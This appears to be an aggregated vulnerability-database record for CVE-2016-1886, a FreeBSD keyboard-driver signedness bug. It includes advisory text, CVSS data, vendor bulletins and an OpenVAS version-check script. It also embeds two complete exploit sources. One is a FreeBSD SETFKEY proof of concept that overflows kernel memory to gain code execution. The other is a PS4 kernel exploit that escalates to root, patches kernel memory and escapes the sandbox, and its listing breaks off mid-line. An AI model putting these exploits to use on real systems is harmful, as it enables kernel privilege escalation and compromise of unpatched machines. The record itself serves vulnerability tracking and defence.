ID CVE-2016-1886 Type cve Reporter cve@mitre.org Modified 2017-04-20T01:59:00
Description
Integer signedness error in the genkbd_commonioctl function in sys/dev/kbd/kbd.c in FreeBSD 9.3 before p42, 10.1 before p34, 10.2 before p17, and 10.3 before p3 allows local users to obtain sensitive information from kernel memory, cause a denial of service (memory overwrite and kernel crash), or gain privileges via a negative value in the flen structure member in the arg argument in a SETFKEY ioctl call, which triggers a "two way heap and stack overflow."
{"id": "CVE-2016-1886", "bulletinFamily": "NVD", "title": "CVE-2016-1886", "description": "Integer signedness error in the genkbd_commonioctl function in sys/dev/kbd/kbd.c in FreeBSD 9.3 before p42, 10.1 before p34, 10.2 before p17, and 10.3 before p3 allows local users to obtain sensitive information from kernel memory, cause a denial of service (memory overwrite and kernel crash), or gain privileges via a negative value in the flen structure member in the arg argument in a SETFKEY ioctl call, which triggers a \"two way heap and stack overflow.\"", "published": "2016-05-25T15:59:00", "modified": "2017-04-20T01:59:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1886", "reporter": "cve@mitre.org", "references": ["https://security.FreeBSD.org/patches/SA-16:18/atkbd.patch", "http://cturt.github.io/SETFKEY.html", "https://www.freebsd.org/security/advisories/FreeBSD-SA-16:18.atkbd.asc", "http://www.securityfocus.com/bid/90734", "http://www.securitytracker.com/id/1035905"], "cvelist": ["CVE-2016-1886"], "type": "cve", "lastseen": "2020-10-03T12:10:42", "edition": 3, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["SOL00246015", "F5:K00246015"]}, {"type": "exploitdb", "idList": ["EDB-ID:44211"]}, {"type": "freebsd", "idList": ["7BBC0E8C-600A-11E6-A6C3-14DAE9D210B8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106750"]}, {"type": "zdt", "idList": ["1337DAY-ID-29915"]}, {"type": "nessus", "idList": ["PFSENSE_SA-16_04.NASL", "FREEBSD_PKG_7BBC0E8C600A11E6A6C314DAE9D210B8.NASL"]}], "modified": "2020-10-03T12:10:42", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-10-03T12:10:42", "rev": 2}, "vulnersScore": 6.3}, "cpe": ["cpe:/o:freebsd:freebsd:9.3", "cpe:/o:freebsd:freebsd:10.3", "cpe:/o:freebsd:freebsd:10.2", "cpe:/o:freebsd:freebsd:10.1"], "affectedSoftware": [{"cpeName": "freebsd:freebsd", "name": "freebsd", "operator": "eq", "version": "9.3"}, {"cpeName": "freebsd:freebsd", "name": "freebsd", "operator": "eq", "version": "10.2"}, {"cpeName": "freebsd:freebsd", "name": "freebsd", "operator": "eq", "version": "10.1"}, {"cpeName": "freebsd:freebsd", "name": "freebsd", "operator": "eq", "version": "10.3"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:9.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:10.1:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:10.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:10.2:*:*:*:*:*:*:*"], "cwe": ["CWE-119"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"f5": [{"lastseen": "2017-06-08T00:16:38", "bulletinFamily": "software", "cvelist": ["CVE-2016-1886"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2016-06-11T03:09:00", "published": "2016-06-11T03:09:00", "href": "https://support.f5.com/csp/article/K00246015", "id": "F5:K00246015", "title": "FreeBSD vulnerability CVE-2016-1886", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:31", "bulletinFamily": "software", "cvelist": ["CVE-2016-1886"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-06-10T00:00:00", "published": "2016-06-10T00:00:00", "id": "SOL00246015", "href": "http://support.f5.com/kb/en-us/solutions/public/k/00/sol00246015.html", "type": "f5", "title": "SOL00246015 - FreeBSD vulnerability CVE-2016-1886", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2018-02-28T15:20:58", "description": "FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC). CVE-2016-1886. Dos exploit for FreeBSD_x86-64 platform", "published": "2016-05-29T00:00:00", "type": "exploitdb", "title": "FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1886"], "modified": "2016-05-29T00:00:00", "id": "EDB-ID:44211", "href": "https://www.exploit-db.com/exploits/44211/", "sourceData": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stddef.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/kbio.h>\r\n#include <sys/types.h>\r\n#include <sys/mman.h>\r\n#include <sys/param.h>\r\n#include <sys/linker.h>\r\n\r\nint (*kprintf)(const char *fmt, ...);\r\nchar *ostype;\r\n\r\nuint64_t originalRip;\r\nuint64_t originalRbp;\r\n\r\nvoid *resolve(char *name) {\r\n\tstruct kld_sym_lookup ksym;\r\n\t\r\n\tksym.version = sizeof(ksym);\r\n\tksym.symname = name;\r\n\t\r\n\tif(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {\r\n\t\tperror(\"kldsym\");\r\n\t\texit(1);\r\n\t}\r\n\t\r\n\tprintf(\" [+] Resolved %s to %#lx\\n\", ksym.symname, ksym.symvalue);\r\n\treturn (void *)ksym.symvalue;\r\n}\r\n\r\nvoid payload(void) {\r\n\tkprintf(\" [+] Entered kernel payload\\n\");\r\n\t\r\n\tstrcpy(ostype, \"CTurt \");\r\n\t\r\n\t__asm__ volatile(\"swapgs; sysret\");\r\n}\r\n\r\n// Copy the stack onto the heap\r\nvoid heapOverflow(int index, size_t size) {\r\n\tfkeyarg_t fkey;\r\n\t\r\n\tfkey.keynum = index;\r\n\tfkey.flen = size;\r\n\tmemset(&fkey.keydef, 0, 16);\r\n\t\r\n\tioctl(0, SETFKEY, &fkey);\r\n}\r\n\r\n// Copy the heap onto the stack\r\nvoid stackOverflow(int index) {\r\n\tfkeyarg_t fkey;\r\n\t\r\n\tfkey.keynum = index;\r\n\tfkey.flen = 16;\r\n\tmemset(&fkey.keydef, 0, 16);\r\n\t\r\n\tioctl(0, GETFKEY, &fkey);\r\n}\r\n\r\nint main(void) {\r\n\tint result, i;\r\n\tfkeyarg_t fkey;\r\n\t\r\n\tuint32_t ripLower4 = 0x808312cd; // jmp rbp\r\n\tuint64_t rbp = (uint64_t)payload;\r\n\t\r\n\t\r\n\tkprintf = resolve(\"printf\");\r\n\tostype = resolve(\"ostype\");\r\n\t\r\n\t\r\n\tprintf(\" [+] Set full length for key 10\\n\");\r\n\tfkey.keynum = 10;\r\n\tfkey.flen = 16;\r\n\tioctl(0, SETFKEY, &fkey);\r\n\t\r\n\t\r\n\tprintf(\" [+] Set bad length and perform heap overflow\\n\");\r\n\theapOverflow(0, 128 - offsetof(fkeyarg_t, keydef) + 8 + 0x30 + sizeof(ripLower4));\r\n\t\r\n\t\r\n\tprintf(\" [+] Prepare stack overflow memory\\n\");\r\n\tfkey.keynum = 10;\r\n\tfkey.flen = 16;\r\n\tioctl(0, GETFKEY, &fkey);\r\n\toriginalRbp = *(uint64_t *)((char *)&fkey.keydef + 4);\r\n\toriginalRip = 0xffffffff00000000 | *(uint32_t *)((char *)&fkey.keydef + 12);\r\n\t\r\n\tprintf(\" [+] Original rip: %#lx\\n\", originalRip);\r\n\tprintf(\" [+] Original rbp: %#lx\\n\", originalRbp);\r\n\t\r\n\t*(uint64_t *)((char *)&fkey.keydef + 4) = rbp;\r\n\t*(uint32_t *)((char *)&fkey.keydef + 12) = ripLower4;\r\n\tioctl(0, SETFKEY, &fkey);\r\n\t\r\n\t\r\n\tprintf(\" [+] Trigger stack overflow\\n\");\r\n\tfflush(stdout);\r\n\t\r\n\tstackOverflow(0);\r\n\t\r\n\t\r\n\treturn 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44211/"}], "openvas": [{"lastseen": "2019-05-29T18:34:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1886"], "description": "Junos OS is prone to a buffer overflow vulnerability in the keyboard\ndriver.", "modified": "2018-10-26T00:00:00", "published": "2017-04-13T00:00:00", "id": "OPENVAS:1361412562310106750", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106750", "type": "openvas", "title": "Junos Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_junos_jsa10784.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Junos Buffer Overflow Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:juniper:junos';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106750\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-13 08:24:49 +0200 (Thu, 13 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-1886\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Junos Buffer Overflow Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_family(\"JunOS Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ssh_junos_get_version.nasl\", \"gb_junos_snmp_version.nasl\");\n script_mandatory_keys(\"Junos/Version\");\n\n script_tag(name:\"summary\", value:\"Junos OS is prone to a buffer overflow vulnerability in the keyboard\ndriver.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable OS build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Incorrect signedness comparison in the ioctl handler allows a malicious\nlocal user to overwrite a portion of the kernel memory. A local user may crash the kernel, read a portion of\nkernel memory and execute arbitrary code in kernel context.\");\n\n script_tag(name:\"impact\", value:\"A local attacker may escalate privileges by executing arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Junos OS 12.3X48, 14.1, 14.2, 15.1 and 16.1.\");\n\n script_tag(name:\"solution\", value:\"New builds of Junos OS software are available from Juniper.\");\n\n script_xref(name:\"URL\", value:\"http://kb.juniper.net/JSA10784\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version =~ \"^12\") {\n if ((revcomp(a: version, b: \"12.3X48-D55\") < 0) &&\n (revcomp(a: version, b: \"12.3X48\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"12.3X48-D55\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^14\") {\n if (revcomp(a: version, b: \"14.1R9\") < 0) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.1R9\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"14.1X53-D50\") < 0) &&\n (revcomp(a: version, b: \"14.1X53\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.1X53-D50\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"14.2R7\") < 0) &&\n (revcomp(a: version, b: \"14.2\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.2R7\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^15\") {\n if ((revcomp(a: version, b: \"15.1F5-S5\") < 0) &&\n (revcomp(a: version, b: \"15.1F\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1F5-S5\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1R5\") < 0) &&\n (revcomp(a: version, b: \"15.1R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1R5\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X49-D60\") < 0) &&\n (revcomp(a: version, b: \"15.1X49\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1X49-D60\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X53-D230\") < 0) &&\n (revcomp(a: version, b: \"15.1X53\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1X53-D230\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^16\") {\n if (revcomp(a: version, b: \"16.1R2\") < 0) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"16.1R2\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1886"], "description": "\nProblem Description:\nIncorrect signedness comparison in the ioctl(2) handler\n\tallows a malicious local user to overwrite a portion of the\n\tkernel memory.\nImpact:\nA local user may crash the kernel, read a portion of\n\tkernel memory and execute arbitrary code in kernel context.\n\tThe result of executing an arbitrary kernel code is privilege\n\tescalation.\n", "edition": 4, "modified": "2016-05-17T00:00:00", "published": "2016-05-17T00:00:00", "id": "7BBC0E8C-600A-11E6-A6C3-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/7bbc0e8c-600a-11e6-a6c3-14dae9d210b8.html", "title": "FreeBSD -- Buffer overflow in keyboard driver", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-03T00:18:07", "description": "Exploit for freebsd platform in category dos / poc", "edition": 1, "published": "2018-03-01T00:00:00", "type": "zdt", "title": "FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - SETFKEY (PoC) Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1886"], "modified": "2018-03-01T00:00:00", "href": "https://0day.today/exploit/description/29915", "id": "1337DAY-ID-29915", "sourceData": "/*\r\n Code written based on info available here http://cturt.github.io/dlclose-overflow.html\r\n \r\n See attached LICENCE file\r\n Thanks to CTurt and qwertyoruiop\r\n \r\n - @kr105rlz\r\n \r\nDownload: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip\r\n*/\r\n \r\n#include \"ps4.h\"\r\n \r\n#define DEBUG_SOCKET\r\n#include \"defines.h\"\r\n \r\nstatic int sock;\r\nstatic void *dump;\r\n \r\nvoid payload(struct knote *kn) {\r\n struct thread *td;\r\n struct ucred *cred;\r\n \r\n // Get td pointer\r\n asm volatile(\"mov %0, %%gs:0\" : \"=r\"(td));\r\n \r\n // Enable UART output\r\n uint16_t *securityflags = (uint16_t*)0xFFFFFFFF833242F6;\r\n *securityflags = *securityflags & ~(1 << 15); // bootparam_disable_console_output = 0\r\n \r\n // Print test message to the UART line\r\n printfkernel(\"\\n\\n\\n\\n\\n\\n\\n\\n\\nHello from kernel :-)\\n\\n\\n\\n\\n\\n\\n\\n\\n\");\r\n \r\n // Disable write protection\r\n uint64_t cr0 = readCr0();\r\n writeCr0(cr0 & ~X86_CR0_WP);\r\n \r\n // sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe\r\n *(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;\r\n *(uint16_t *)0xFFFFFFFF82607826 = 0x9090;\r\n \r\n *(char *)0xFFFFFFFF8332431A = 1;\r\n *(char *)0xFFFFFFFF83324338 = 1;\r\n \r\n // Restore write protection\r\n writeCr0(cr0);\r\n \r\n // Resolve creds\r\n cred = td->td_proc->p_ucred;\r\n \r\n // Escalate process to root\r\n cred->cr_uid = 0;\r\n cred->cr_ruid = 0;\r\n cred->cr_rgid = 0;\r\n cred->cr_groups[0] = 0;\r\n \r\n void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred\r\n \r\n // sceSblACMgrIsSystemUcred\r\n uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);\r\n *sonyCred = 0xffffffffffffffff;\r\n \r\n // sceSblACMgrGetDeviceAccessType\r\n uint64_t *sceProcType = (uint64_t *)(((char *)td_ucred) + 88);\r\n *sceProcType = 0x3801000000000013; // Max access\r\n \r\n // sceSblACMgrHasSceProcessCapability\r\n uint64_t *sceProcCap = (uint64_t *)(((char *)td_ucred) + 104);\r\n *sceProcCap = 0xffffffffffffffff; // Sce Process\r\n \r\n ((uint64_t *)0xFFFFFFFF832CC2E8)[0] = 0x123456; //priv_check_cred bypass with suser_enabled=true\r\n ((uint64_t *)0xFFFFFFFF8323DA18)[0] = 0; // bypass priv_check\r\n \r\n // Jailbreak ;)\r\n cred->cr_prison = (void *)0xFFFFFFFF83237250; //&prison0\r\n \r\n // Break out of the sandbox\r\n void *td_fdp = *(void **)(((char *)td->td_proc) + 72);\r\n uint64_t *td_fdp_fd_rdir = (uint64_t *)(((char *)td_fdp) + 24);\r\n uint64_t *td_fdp_fd_jdir = (uint64_t *)(((char *)td_fdp) + 32);\r\n uint64_t *rootvnode = (uint64_t *)0xFFFFFFFF832EF920;\r\n *td_fdp_fd_rdir = *rootvnode;\r\n *td_fdp_fd_jdir = *rootvnode;\r\n}\r\n \r\n// Perform kernel allocation aligned to 0x800 bytes\r\nint kernelAllocation(size_t size, int fd) {\r\n SceKernelEqueue queue = 0;\r\n sceKernelCreateEqueue(&queue, \"kexec\");\r\n \r\n sceKernelAddReadEvent(queue, fd, 0, NULL);\r\n \r\n return queue;\r\n}\r\n \r\nvoid kernelFree(int allocation) {\r\n close(allocation);\r\n}\r\n \r\nvoid *exploitThread(void *none) {\r\n printfsocket(\"[+] Entered exploitThread\\n\");\r\n \r\n uint64_t bufferSize = 0x8000;\r\n uint64_t overflowSize = 0x8000;\r\n uint64_t copySize = bufferSize + overflowSize;\r\n \r\n // Round up to nearest multiple of PAGE_SIZE\r\n uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);\r\n \r\n uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\r\n munmap(mapping + mappingSize, PAGE_SIZE);\r\n \r\n uint8_t *buffer = mapping + mappingSize - copySize;\r\n \r\n int64_t count = (0x100000000 + bufferSize) / 4;\r\n \r\n // Create structures\r\n struct knote kn;\r\n struct filterops fo;\r\n struct knote **overflow = (struct knote **)(buffer + bufferSize);\r\n overflow[2] = &kn;\r\n kn.kn_fop = &fo;\r\n \r\n // Setup trampoline to gracefully return to the calling thread\r\n void *trampw = NULL;\r\n void *trampe = NULL;\r\n int executableHandle;\r\n int writableHandle;\r\n uint8_t trampolinecode[] = {\r\n 0x58, // pop rax\r\n 0x48, 0xB8, 0x19, 0x39, 0x40, 0x82, 0xFF, 0xFF, 0xFF, 0xFF, // movabs rax, 0xffffffff82403919\r\n 0x50, // push rax\r\n 0x48, 0xB8, 0xBE, 0xBA, 0xAD, 0xDE, 0xDE, 0xC0, 0xAD, 0xDE, // movabs rax, 0xdeadc0dedeadbabe\r\n 0xFF, 0xE0 // jmp rax\r\n };\r\n \r\n // Get Jit memory\r\n sceKernelJitCreateSharedMemory(0, PAGE_SIZE, PROT_CPU_READ | PROT_CPU_WRITE | PROT_CPU_EXEC, &executableHandle);\r\n sceKernelJitCreateAliasOfSharedMemory(executableHandle, PROT_CPU_READ | PROT_CPU_WRITE, &writableHandle);\r\n \r\n // Map r+w & r+e\r\n trampe = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_EXEC, MAP_SHARED, executableHandle, 0);\r\n trampw = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_TYPE, writableHandle, 0);\r\n \r\n // Copy trampoline to allocated address\r\n memcpy(trampw, trampolinecode, sizeof(trampolinecode)); \r\n *(void **)(trampw + 14) = (void *)payload;\r\n \r\n // Call trampoline when overflown\r\n fo.f_detach = trampe;\r\n \r\n // Start the exploit\r\n int sockets[0x2000];\r\n int allocation[50], m = 0, m2 = 0;\r\n int fd = (bufferSize - 0x800) / 8;\r\n \r\n printfsocket(\"[+] Creating %d sockets\\n\", fd);\r\n \r\n // Create sockets\r\n for(int i = 0; i < 0x2000; i++) {\r\n sockets[i] = sceNetSocket(\"sss\", AF_INET, SOCK_STREAM, 0);\r\n if(sockets[i] >= fd) {\r\n sockets[i + 1] = -1;\r\n break;\r\n }\r\n }\r\n \r\n // Spray the heap\r\n for(int i = 0; i < 50; i++) {\r\n allocation[i] = kernelAllocation(bufferSize, fd);\r\n printfsocket(\"[+] allocation = %llp\\n\", allocation[i]);\r\n }\r\n \r\n // Create hole for the system call's allocation\r\n m = kernelAllocation(bufferSize, fd);\r\n m2 = kernelAllocation(bufferSize, fd);\r\n kernelFree(m);\r\n \r\n // Perform the overflow\r\n int result = syscall(597, 1, mapping, &count);\r\n printfsocket(\"[+] Result: %d\\n\", result);\r\n \r\n // Execute the payload\r\n printfsocket(\"[+] Freeing m2\\n\");\r\n kernelFree(m2);\r\n \r\n // Close sockets\r\n for(int i = 0; i < 0x2000; i++) {\r\n if(sockets[i] == -1)\r\n break;\r\n sceNetSocketClose(sockets[i]);\r\n }\r\n \r\n // Free allocations\r\n for(int i = 0; i < 50; i++) {\r\n kernelFree(allocation[i]);\r\n }\r\n \r\n // Free the mapping\r\n munmap(mapping, mappingSize);\r\n \r\n return NULL;\r\n}\r\n \r\nint _main(void) {\r\n ScePthread thread;\r\n \r\n initKernel(); \r\n initLibc();\r\n initNetwork();\r\n initJIT();\r\n initPthread();\r\n \r\n#ifdef DEBUG_SOCKET\r\n struct sockaddr_in server;\r\n \r\n server.sin_len = sizeof(server);\r\n server.sin_family = AF_INET;\r\n server.sin_addr.s_addr = IP(192, 168, 0, 4);\r\n server.sin_port = sceNetHtons(9023);\r\n memset(server.sin_zero, 0, sizeof(server.sin_zero));\r\n sock = sceNetSocket(\"debug\", AF_INET, SOCK_STREAM, 0);\r\n sceNetConnect(sock, (struct sockaddr *)&server, sizeof(server));\r\n \r\n int flag = 1;\r\n sceNetSetsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));\r\n \r\n dump = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\r\n#endif\r\n \r\n printfsocket(\"[+] Starting...\\n\");\r\n printfsocket(\"[+] UID = %d\\n\", getuid());\r\n printfsocket(\"[+] GID = %d\\n\", getgid());\r\n \r\n // Create exploit thread\r\n if(scePthreadCreate(&thread, NULL, exploitThread, NULL, \"exploitThread\") != 0) {\r\n printfsocket(\"[-] pthread_create error\\n\");\r\n return 0;\r\n }\r\n \r\n // Wait for thread to exit\r\n scePthreadJoin(thread, NULL);\r\n \r\n // At this point we should have root and jailbreak\r\n if(getuid() != 0) {\r\n printfsocket(\"[-] Kernel patch failed!\\n\");\r\n sceNetSocketClose(sock);\r\n return 1;\r\n }\r\n \r\n printfsocket(\"[+] Kernel patch success!\\n\");\r\n \r\n // Enable debug menu\r\n int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = 